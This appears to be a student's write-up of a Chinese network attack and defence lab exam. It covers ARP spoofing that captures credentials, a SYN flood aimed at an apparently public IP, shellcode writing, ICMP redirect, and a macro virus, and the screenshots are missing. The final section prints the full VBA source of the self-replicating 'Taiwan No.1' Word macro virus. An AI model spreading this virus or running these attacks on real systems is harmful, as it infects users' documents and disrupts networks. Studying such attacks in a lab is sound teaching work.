《網絡攻擊與防禦》課程機考試題

《網絡攻擊與防禦》課程機考試題

機考要求：
1.考試時間內完成所有實驗考覈內容；
2.需完整實驗並記錄下實驗過程；
3.考試時間120分鐘；
4.滿分100分，每題20分。

一、利用Netwag或類似工具進行ARP欺騙攻擊，並利用Wireshark捕獲相關網絡數據。

這裏使用的是kali工具：ettercap，三臺機器，一臺服務器，一臺客戶端，一臺攻擊機，kali當作攻擊機，windowsxp當作客戶端，windows2003當作服務端。
首先搭好服務器：

然後客戶端訪問：

打開kali的工具ettercap，查找主機，找到兩個：

配置好之後，在客戶端輸入123，密碼123，kali進行查看到賬戶密碼，欺騙成功：

二、利用Netwag或類似工具進行DDOS攻擊，並利用Wireshark捕獲相關網絡數據。

這裏用的是SYN Floor攻擊，SYN Flood是當前最流行的DoS與DDoS的攻擊方式之一。
netwag選擇76號，輸入SYN flood攻擊的目標ip和端口，這裏使用的IP：122.13.75.80：


運行之後輸入過濾規則，方便查看：ip.src122.13.75.80 or ip.dst122.13.75.80，結果如下：

三、請編寫一段Shellcode，並將實驗過程及結果詳細記錄下來。

運行一個代碼：

下斷點，然後查看彙編代碼：

記錄下地址，然後查看內存：

這是真實地址：

編寫彙編程序，運行得到：

下斷點，調式：

查看彙編代碼：

查看內存，複製如下數值：

然後這個數值就是shellcode，編寫如下代碼：

運行之後也能彈出窗口：

四、利用Netwag或類似工具進行ICMP重定向攻擊，並利用Wireshark捕獲相關網絡數據。

打開Netwag軟件找到86：

在newgateway填寫自己的ip地址，使自己ip僞造成路由器：

攻擊結果如下：

五、利用“臺灣一號”宏病毒進行實驗性攻擊，並將實驗過程及結果詳細記錄下來。

打開word2003，修改設置，工具->宏->安全性->安全性選擇最低


點擊確定！然後alt+F11進入編輯界面，在對應的地方輸入宏代碼，然後保存：

修改時間日期爲1號，然後雙擊打開文檔，出現如下界面：

輸入正確的答案得到，錯誤則會顯示很多的word文檔，結束進程即可關閉：

臺灣一號宏代碼：

'moonlight
Dim nm(4)
Sub Document_Open()
'DisableInput 1

Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule


Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then
    Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'moonlight" Then
    
    .DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 3, "Sub Document_Close()"
    If ThisDocument = NormalTemplate Then
        .ReplaceLine 3, "Sub Document_Open()"
        ActiveDocument.SaveAs ActiveDocument.FullName
    End If
    
End If

End With

Count = 0
If Day(Now()) = 1 Then
try:
        On Error GoTo try
        test = -1
        con = 1
        tog$ = ""
        i = 0
        While test = -1
            For i = 0 To 4
                nm(i) = Int(Rnd() * 10)
                con = con * nm(i)
                If i = 4 Then
                    tog$ = tog$ + Str$(nm(4)) + "=?"
                    GoTo beg
                End If
                tog$ = tog$ + Str$(nm(i)) + "*"
            Next i
beg:
        Beep
        ans$ = InputBox$("今天是" + Date$ + ",跟你玩一個心算遊戲" + Chr$(13) + "若你答錯，只好接受震撼教育......" + Chr$(13) + tog$, "臺灣NO.1 Macro Virus")
        If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
            Documents.Add
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Beep
            With Selection.Font
                .Name = "細明體"
                .Size = 16
                .Bold = 1
                .Underline = 1
            End With
            Selection.InsertAfter Text:="何謂宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案："
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="我就是......"
            Selection.InsertParagraphAfter
            Selection.InsertParagraphAfter
            Selection.Font.Italic = 0
            Beep
            Selection.InsertAfter Text:="如何預防宏病毒"
            Selection.InsertParagraphAfter
            Beep
            Selection.InsertAfter Text:="答案："
            Selection.Font.Italic = 1
            Selection.InsertAfter Text:="不要看我......"
            GoTo out
            Else
                Count = Count + 1
                For j = 1 To 20
                    Beep
                    Documents.Add
                Next j
            Selection.Paragraphs.Alignment = wdAlignParagraphCenter
            Selection.InsertAfter Text:="宏病毒"
            If Count = 2 Then GoTo out
            GoTo try
        End If
Wend
End If
out:
End Sub